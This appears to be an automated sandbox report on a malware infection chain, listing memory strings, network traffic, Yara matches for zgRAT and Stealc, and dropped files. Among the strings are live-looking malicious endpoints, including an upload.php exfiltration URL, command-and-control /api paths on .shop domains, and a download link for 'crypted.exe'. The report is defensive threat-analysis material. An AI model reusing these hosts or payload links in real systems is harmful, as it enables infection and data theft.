Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000028F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/
Source: channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/6k
Source: channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/Uk8
Source: channel3.exe, 00000027.00000002.2765546909.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, channel3.exe, 00000027.00000002.2765546909.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, channel3.exe, 00000027.00000003.2697186516.00000000012E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/v1/upload.php
Source: channel3.exe, 00000027.00000002.2765546909.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/v1/upload.phpe
Source: channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/v1/upload.phpsa
Source: channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thirtv13vt.top/xk
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.entrust.net/rpa03
Source: stealc_default2.exe, stealc_default2.exe, 00000016.00000002.2301366452.000000006C8CD000.00000002.00000001.01000000.0000001A.sdmp, svchost015.exe, 00000019.00000002.2566561207.000000006C02D000.00000002.00000001.01000000.0000001A.sdmp, mozglue[1].dll.25.dr, mozglue[1].dll.22.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301143327.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2561788558.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/order
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/license
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: stealc_default2.exe, 00000016.00000003.2145545317.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.000000000321E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: build.exe, 0000001C.00000002.2400677209.000000000321E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2145545317.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2145545317.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/
Source: BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/;-
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000025.00000002.2579761363.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2699501604.0000000002F85000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/api
Source: BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/apiO3
Source: BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/apix3
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/k
Source: BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop:443/api
Source: BitLockerToGo.exe, 00000025.00000003.2530995125.0000000002A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://millyscroqwp.shop/K
Source: BitLockerToGo.exe, 0000002D.00000003.2699501604.0000000002F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://millyscroqwp.shop/api
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: https://mozilla.org0/
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nel.heroku.com/reports?ts=1725376397&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=VilhT43dcQ97
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nel.heroku.com/reports?ts=1725376406&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=Vt5oH5Hgm5hl
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nel.heroku.com/reports?ts=1725376427&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=X3iu6xKf%2Bi
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adminforge.de/
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adminforge.de/5
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adminforge.de/get/5dfLDESaxz/crypted.exe
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adminforge.de/get/5dfLDESaxz/crypted.exeE
Source: AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adminforge.de/get/5dfLDESaxz/crypted.exeUAPP.EXM
Source: Set-up.exe, 00000017.00000000.2142761515.0000000000882000.00000002.00000001.01000000.00000017.sdmp, Setup.exe, 0000001A.00000002.2756433325.0000000000881000.00000002.00000001.01000000.0000001C.sdmp, channel3.exe, 00000027.00000002.2748069028.0000000000881000.00000002.00000001.01000000.00000022.sdmp, channel3[1].exe.31.dr, Set-up[1].exe.7.dr	String found in binary or memory: https://update-ledger.net/update
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2699501604.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2687524545.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-ma
Source: BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mozglue[1].dll.25.dr, nss3[1].dll.25.dr, nss3[1].dll.22.dr, freebl3[1].dll.22.dr, softokn3[1].dll.22.dr, mozglue[1].dll.22.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: stealc_default2.exe, 00000016.00000003.2145545317.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa0
Source: rHCHrI9F0v.exe, 00000011.00000002.2166488354.000000000382B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp, JKJDBAAAEHIEGCAKFHCG.25.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000016.00000003.2225695898.000000002D627000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2400089478.000000002D272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	String found in binary or memory: https://www.ssl.com/repository0
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.8.206:443 -> 192.168.2.8:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49830 version: TLS 1.2

Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_ea7a066c-0

Source: Yara match	File source: 25.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpCF9F.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpC653.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE1C0.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpC568.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpCF9E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE1AF.tmp	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: crypted[1].exe.7.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: crypted.exe.7.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe

File dump: service123.exe.26.dr 242094080

Jump to dropped file

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048C9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	19_2_0048C9F7
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0063C9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	20_2_0063C9F7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	22_2_6C8BB700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C8BB8C0 rand_s,NtQueryVirtualMemory,	22_2_6C8BB8C0
